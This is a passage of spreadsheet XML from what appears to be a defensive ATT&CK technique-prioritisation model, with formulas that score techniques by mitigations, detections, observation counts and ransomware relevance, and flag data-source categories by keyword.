        <v>0.3</v>
      </c>
      <c r="B185" s="37">
        <f t="shared" si="2"/>
        <v>181.34200595238099</v>
      </c>
      <c r="C185" s="37" t="s">
        <v>664</v>
      </c>
      <c r="D185" s="50" t="s">
        <v>665</v>
      </c>
      <c r="E185" s="37"/>
      <c r="F185" s="37">
        <v>1</v>
      </c>
      <c r="G185" s="37">
        <v>2</v>
      </c>
      <c r="H185" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I185" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J185" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K185" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L185" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M185" s="37">
        <v>1.27E-4</v>
      </c>
      <c r="N185" s="56">
        <v>0</v>
      </c>
      <c r="O185" s="56">
        <v>1</v>
      </c>
      <c r="P185" s="56">
        <v>0</v>
      </c>
      <c r="Q185" s="56">
        <v>0</v>
      </c>
      <c r="R185" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S185" s="57">
        <v>2</v>
      </c>
      <c r="T185" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U185" s="57">
        <v>8</v>
      </c>
      <c r="V185" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.9999904761904762E-2</v>
      </c>
      <c r="W185" s="37">
        <v>10</v>
      </c>
      <c r="X185" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y185" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z185" s="37">
        <v>1</v>
      </c>
      <c r="AA185" s="37">
        <v>0.01</v>
      </c>
      <c r="AB185" s="37">
        <v>0.01</v>
      </c>
      <c r="AC185" s="37"/>
      <c r="AD185" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE185" s="37" t="str" cm="1">
        <f t="array" ref="AE185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF185" s="37">
        <v>181</v>
      </c>
      <c r="AG185" s="37" t="str" cm="1">
        <f t="array" ref="AG185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD185)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH185" s="37">
        <v>181</v>
      </c>
      <c r="AI185" s="37" t="str" cm="1">
        <f t="array" ref="AI185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ185" s="37">
        <v>181</v>
      </c>
      <c r="AK185" s="37" t="str" cm="1">
        <f t="array" ref="AK185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL185" s="37">
        <v>181</v>
      </c>
      <c r="AM185" s="37" t="str" cm="1">
        <f t="array" ref="AM185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN185" s="37">
        <v>0</v>
      </c>
      <c r="AO185" s="37">
        <v>0</v>
      </c>
      <c r="AP185" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ185" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>60.447335317460329</v>
      </c>
      <c r="AR185" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS185" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT185" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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86" spans="1:47" ht="51">
      <c r="A186" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B186" s="37">
        <f t="shared" si="2"/>
        <v>1156.3850674285713</v>
      </c>
      <c r="C186" s="37" t="s">
        <v>666</v>
      </c>
      <c r="D186" s="50" t="s">
        <v>667</v>
      </c>
      <c r="E186" s="37"/>
      <c r="F186" s="37">
        <v>5</v>
      </c>
      <c r="G186" s="37">
        <v>3</v>
      </c>
      <c r="H186" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I186" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J186" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K186" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L186" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M186" s="37">
        <v>0.69578600000000002</v>
      </c>
      <c r="N186" s="56">
        <v>4</v>
      </c>
      <c r="O186" s="56">
        <v>47</v>
      </c>
      <c r="P186" s="56">
        <v>9</v>
      </c>
      <c r="Q186" s="56">
        <v>23</v>
      </c>
      <c r="R186" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S186" s="57">
        <v>2</v>
      </c>
      <c r="T186" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U186" s="57">
        <v>8</v>
      </c>
      <c r="V186" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.49047609523809521</v>
      </c>
      <c r="W186" s="37">
        <v>10</v>
      </c>
      <c r="X186" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y186" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z186" s="37">
        <v>83</v>
      </c>
      <c r="AA186" s="37">
        <v>0.83</v>
      </c>
      <c r="AB186" s="37">
        <v>0.83</v>
      </c>
      <c r="AC186" s="37"/>
      <c r="AD186" s="50" t="s">
        <v>668</v>
      </c>
      <c r="AE186" s="37" t="str" cm="1">
        <f t="array" ref="AE186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF186" s="37">
        <v>182</v>
      </c>
      <c r="AG186" s="37" t="str" cm="1">
        <f t="array" ref="AG186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD186)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH186" s="37">
        <v>182</v>
      </c>
      <c r="AI186" s="37" t="str" cm="1">
        <f t="array" ref="AI186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD186)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ186" s="37">
        <v>182</v>
      </c>
      <c r="AK186" s="37" t="str" cm="1">
        <f t="array" ref="AK186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL186" s="37">
        <v>182</v>
      </c>
      <c r="AM186" s="37" t="str" cm="1">
        <f t="array" ref="AM186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN186" s="37">
        <v>0</v>
      </c>
      <c r="AO186" s="37">
        <v>4</v>
      </c>
      <c r="AP186" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ186" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>385.4616891428571</v>
      </c>
      <c r="AR186" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS186" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT186" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU18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36.805875156462577</v>
      </c>
    </row>
    <row r="187" spans="1:47" ht="17">
      <c r="A187" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B187" s="37">
        <f t="shared" si="2"/>
        <v>698.39140499999996</v>
      </c>
      <c r="C187" s="37" t="s">
        <v>669</v>
      </c>
      <c r="D187" s="50" t="s">
        <v>670</v>
      </c>
      <c r="E187" s="37"/>
      <c r="F187" s="37">
        <v>1</v>
      </c>
      <c r="G187" s="37">
        <v>15</v>
      </c>
      <c r="H187" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I187" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J187" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K187" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.5</v>
      </c>
      <c r="L187" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M187" s="37">
        <v>0.24088000000000001</v>
      </c>
      <c r="N187" s="56">
        <v>0</v>
      </c>
      <c r="O187" s="56">
        <v>12</v>
      </c>
      <c r="P187" s="56">
        <v>6</v>
      </c>
      <c r="Q187" s="56">
        <v>0</v>
      </c>
      <c r="R187" s="57"/>
      <c r="S187" s="57">
        <v>1</v>
      </c>
      <c r="T187" s="57" t="s">
        <v>671</v>
      </c>
      <c r="U187" s="57">
        <v>7</v>
      </c>
      <c r="V187" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190499999999999</v>
      </c>
      <c r="W187" s="37">
        <v>8</v>
      </c>
      <c r="X187" s="37">
        <v>0.145455</v>
      </c>
      <c r="Y187" s="37">
        <v>0.145455</v>
      </c>
      <c r="Z187" s="37">
        <v>18</v>
      </c>
      <c r="AA187" s="37">
        <v>0.18</v>
      </c>
      <c r="AB187" s="37">
        <v>0.18</v>
      </c>
      <c r="AC187" s="37"/>
      <c r="AD187" s="50" t="s">
        <v>404</v>
      </c>
      <c r="AE187" s="37" t="str" cm="1">
        <f t="array" ref="AE187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD187)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF187" s="37">
        <v>183</v>
      </c>
      <c r="AG187" s="37" t="str" cm="1">
        <f t="array" ref="AG187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH187" s="37">
        <v>183</v>
      </c>
      <c r="AI187" s="37" t="str" cm="1">
        <f t="array" ref="AI187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ187" s="37">
        <v>183</v>
      </c>
      <c r="AK187" s="37" t="str" cm="1">
        <f t="array" ref="AK187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL187" s="37">
        <v>183</v>
      </c>
      <c r="AM187" s="37" t="str" cm="1">
        <f t="array" ref="AM187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN187" s="37">
        <v>0</v>
      </c>
      <c r="AO187" s="37">
        <v>4</v>
      </c>
      <c r="AP187" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ187" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>232.797135</v>
      </c>
      <c r="AR187" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS187" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT187" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU18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22.266393809523809</v>
      </c>
    </row>
    <row r="188" spans="1:47" ht="68">
      <c r="A188" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B188" s="37">
        <f t="shared" si="2"/>
        <v>73.7</v>
      </c>
      <c r="C188" s="37" t="s">
        <v>672</v>
      </c>
      <c r="D188" s="50" t="s">
        <v>673</v>
      </c>
      <c r="E188" s="37"/>
      <c r="F188" s="37">
        <v>1</v>
      </c>
      <c r="G188" s="37">
        <v>1</v>
      </c>
      <c r="H188" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I188" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J188" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K188" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L188" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M188" s="37">
        <v>0</v>
      </c>
      <c r="N188" s="56">
        <v>0</v>
      </c>
      <c r="O188" s="56">
        <v>0</v>
      </c>
      <c r="P188" s="56">
        <v>0</v>
      </c>
      <c r="Q188" s="56">
        <v>0</v>
      </c>
      <c r="R188" s="57"/>
      <c r="S188" s="57">
        <v>0</v>
      </c>
      <c r="T188" s="57"/>
      <c r="U188" s="57">
        <v>0</v>
      </c>
      <c r="V188" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W188" s="37">
        <v>0</v>
      </c>
      <c r="X188" s="37">
        <v>0</v>
      </c>
      <c r="Y188" s="37">
        <v>0</v>
      </c>
      <c r="Z188" s="37">
        <v>0</v>
      </c>
      <c r="AA188" s="37">
        <v>0</v>
      </c>
      <c r="AB188" s="37">
        <v>0</v>
      </c>
      <c r="AC188" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD188" s="50" t="s">
        <v>674</v>
      </c>
      <c r="AE188" s="37" t="str" cm="1">
        <f t="array" ref="AE188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD188)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF188" s="37">
        <v>184</v>
      </c>
      <c r="AG188" s="37" t="str" cm="1">
        <f t="array" ref="AG188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD188)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH188" s="37">
        <v>184</v>
      </c>
      <c r="AI188" s="37" t="str" cm="1">
        <f t="array" ref="AI188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD188)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ188" s="37">
        <v>184</v>
      </c>
      <c r="AK188" s="37" t="str" cm="1">
        <f t="array" ref="AK188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD188)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL188" s="37">
        <v>184</v>
      </c>
      <c r="AM188" s="37" t="str" cm="1">
        <f t="array" ref="AM188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD188)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN188" s="37">
        <v>0</v>
      </c>
      <c r="AO188" s="37"/>
      <c r="AP188" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ188" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>24.566666666666666</v>
      </c>
      <c r="AR188" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS188" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT188" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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89" spans="1:47" ht="51">
      <c r="A189" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B189" s="37">
        <f t="shared" si="2"/>
        <v>645.55006100000003</v>
      </c>
      <c r="C189" s="37" t="s">
        <v>675</v>
      </c>
      <c r="D189" s="50" t="s">
        <v>676</v>
      </c>
      <c r="E189" s="37"/>
      <c r="F189" s="37">
        <v>4</v>
      </c>
      <c r="G189" s="37">
        <v>4</v>
      </c>
      <c r="H189" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I189" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J189" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K189" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L189" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M189" s="37">
        <v>4.5209999999999998E-3</v>
      </c>
      <c r="N189" s="56">
        <v>0</v>
      </c>
      <c r="O189" s="56">
        <v>10</v>
      </c>
      <c r="P189" s="56">
        <v>19</v>
      </c>
      <c r="Q189" s="56">
        <v>25</v>
      </c>
      <c r="R189" s="57" t="s">
        <v>677</v>
      </c>
      <c r="S189" s="57">
        <v>8</v>
      </c>
      <c r="T189" s="57" t="s">
        <v>678</v>
      </c>
      <c r="U189" s="57">
        <v>14</v>
      </c>
      <c r="V189" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.46666666666666673</v>
      </c>
      <c r="W189" s="37">
        <v>22</v>
      </c>
      <c r="X189" s="37">
        <v>0.4</v>
      </c>
      <c r="Y189" s="37">
        <v>0.4</v>
      </c>
      <c r="Z189" s="37">
        <v>54</v>
      </c>
      <c r="AA189" s="37">
        <v>0.54</v>
      </c>
      <c r="AB189" s="37">
        <v>0.54</v>
      </c>
      <c r="AC189" s="37"/>
      <c r="AD189" s="50" t="s">
        <v>679</v>
      </c>
      <c r="AE189" s="37" t="str" cm="1">
        <f t="array" ref="AE189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD189)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF189" s="37">
        <v>185</v>
      </c>
      <c r="AG189" s="37" t="str" cm="1">
        <f t="array" ref="AG189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH189" s="37">
        <v>185</v>
      </c>
      <c r="AI189" s="37" t="str" cm="1">
        <f t="array" ref="AI189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD189)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ189" s="37">
        <v>185</v>
      </c>
      <c r="AK189" s="37" t="str" cm="1">
        <f t="array" ref="AK189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL189" s="37">
        <v>185</v>
      </c>
      <c r="AM189" s="37" t="str" cm="1">
        <f t="array" ref="AM189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN189" s="37">
        <v>0</v>
      </c>
      <c r="AO189" s="37">
        <v>6</v>
      </c>
      <c r="AP189" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ189" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>215.18335366666668</v>
      </c>
      <c r="AR189" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS189" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT189" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU18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30.883336238095239</v>
      </c>
    </row>
    <row r="190" spans="1:47" ht="34">
      <c r="A190" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B190" s="37">
        <f t="shared" si="2"/>
        <v>266.0713576190476</v>
      </c>
      <c r="C190" s="37" t="s">
        <v>680</v>
      </c>
      <c r="D190" s="50" t="s">
        <v>676</v>
      </c>
      <c r="E190" s="37" t="s">
        <v>681</v>
      </c>
      <c r="F190" s="37">
        <v>1</v>
      </c>
      <c r="G190" s="37">
        <v>1</v>
      </c>
      <c r="H190" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I190" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J190" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K190" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L190" s="37">
